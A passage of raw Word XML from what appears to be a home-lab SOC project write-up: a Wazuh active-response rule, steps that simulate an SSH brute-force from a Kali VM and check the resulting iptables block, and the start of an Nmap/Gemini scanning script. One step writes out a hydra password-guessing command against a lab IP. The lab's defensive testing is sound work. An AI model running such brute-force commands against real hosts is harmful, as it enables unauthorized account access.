            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12F3DD4D" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="307D804E" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">  &lt;!-- Friendly alert for firewall-drop --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B0060D" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">  &lt;rule id="100301" level="7"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50E51922" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">    &lt;if_matched_sid&gt;651&lt;/if_matched_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00020339" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">    &lt;field name="program"&gt;active-response/bin/firewall-drop&lt;/field&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68425B53" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">    &lt;description&gt;Host blocked by firewall-drop Active Response.&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54B67324" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">    &lt;options&gt;no_full_log&lt;/options&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="766C1AAB" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C481639" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6489452C" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F2B5F6B" w14:textId="77777777" w:rsidR="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0662F660" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CA51E8" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attack Simulation Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB50D84" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Kali VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>, run a brute-force SSH attempt against the Ubuntu-Desktop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D471CC" w14:textId="77777777" w:rsidR="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>hydra -l malek -P passwords.txt 192.168.182.131 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25894E18" w14:textId="4D4DC1B6" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>user : malek / password file link : passwords.txt / Victim IP : 192.168.182.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E67DE" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh Agent detects multiple SSH authentication failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E837170" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Active Response triggers firewall-drop and temporarily blocks the attacker's IP (192.168.182.136).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A39B98" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Verify the block on the Ubuntu-Desktop using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4695021E" w14:textId="77777777" w:rsidR="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudo iptables -L INPUT -n --line-numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F632BE7" w14:textId="62F4F4CB" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="004C5685">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00716BDC">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sudo iptables -D INPUT &lt;line-number&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">    # To delete specif table to unblock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F01F4" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>After the timeout (180 seconds), the block is automatically lifted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7ACB4C" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outcome:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD624C3" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SSH brute-force attacks are detected and mitigated in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D13F2" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attacker’s IP is temporarily blocked to prevent system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589EE701" w14:textId="61C46840" w:rsidR="006C2F05" w:rsidRPr="00EE4FDA" w:rsidRDefault="00F56897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Timeout ensures repeated testing without permanent network disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68393602" w14:textId="0E37CD90" w:rsidR="0098112A" w:rsidRDefault="00EE4FDA" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FD640A6" wp14:editId="4F0DE589">
            <wp:extent cx="6637020" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177830671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1013460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1FC169" w14:textId="77777777" w:rsidR="00EE4FDA" w:rsidRDefault="00EE4FDA" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67721DFF" w14:textId="77777777" w:rsidR="00EE4FDA" w:rsidRPr="006C2F05" w:rsidRDefault="00EE4FDA" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A52111D" w14:textId="6302FC61" w:rsidR="00EE4FDA" w:rsidRDefault="009A7B95" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="046743F6" wp14:editId="2ABCCD52">
            <wp:extent cx="6637020" cy="2865120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="287184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7020" cy="2865120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA47B3" w14:textId="77777777" w:rsidR="00EE4FDA" w:rsidRPr="006C2F05" w:rsidRDefault="00EE4FDA" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09ACCF4E" w14:textId="3F04283F" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>AI Integration — Nmap &amp; Gemini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DC3C5" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC3968" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Nmap is a free, open-source port scanner used to detect open ports, identify services, and gather system information (OS, versions, etc.). Available on Windows, macOS, and Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C30047" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Gemini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5013BE" w14:textId="6EB958C4" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Gemini is a multimodal AI model (developed by Google). It can process text, images, video, and audio. In this project, Gemini enriches Nmap results with service explanations, known vulnerabilities, and operational recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2112385E" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Integration Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5309278B" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Perform local scans from endpoints (Windows / Ubuntu) using Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213EDE95" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Send structured JSON results to Wazuh via a Python script executed by the agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EDC0DD" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Detect Nmap results in Wazuh and enrich them via Gemini.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F2987A" w14:textId="1D88C7DD" w:rsidR="007B3EE9" w:rsidRPr="00567DF6" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D03BBD" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Nmap Python Script (nmapscan.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26909D13" w14:textId="682595BD" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Windows Path:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>C:\Users\Administrator\Documents\soc-scripts\nmapscan.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E6AC75" w14:textId="4F69CB52" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ubuntu Path:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3EE9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/home/malek/Documents/soc-scripts/nmapscan.py</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B3EE9" w14:paraId="12393F5E" w14:textId="77777777" w:rsidTr="007B3EE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5E2FC5F3" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:lastRenderedPageBreak/>
              <w:t>#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C9EEAA" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>import nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D5E579" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D11425" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>import json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09FEAA56" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>import platform</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D95606" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71C5E12B" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t>def scan_subnet(subnet):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F5C2947" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    nm = nmap.PortScanner()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA86FF9" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    nm.scan(subnet)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61DC5B80" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    results = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DAF389B" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="261B7CDC" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">    for host in nm.all_hosts():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0791C2A4" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="007B3EE9">
              <w:t xml:space="preserve">        for proto in nm[host].all_protocols():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE4C253" w14:textId="77777777" w:rsidR="007B3EE9" w:rsidRPr="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="007B3EE9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
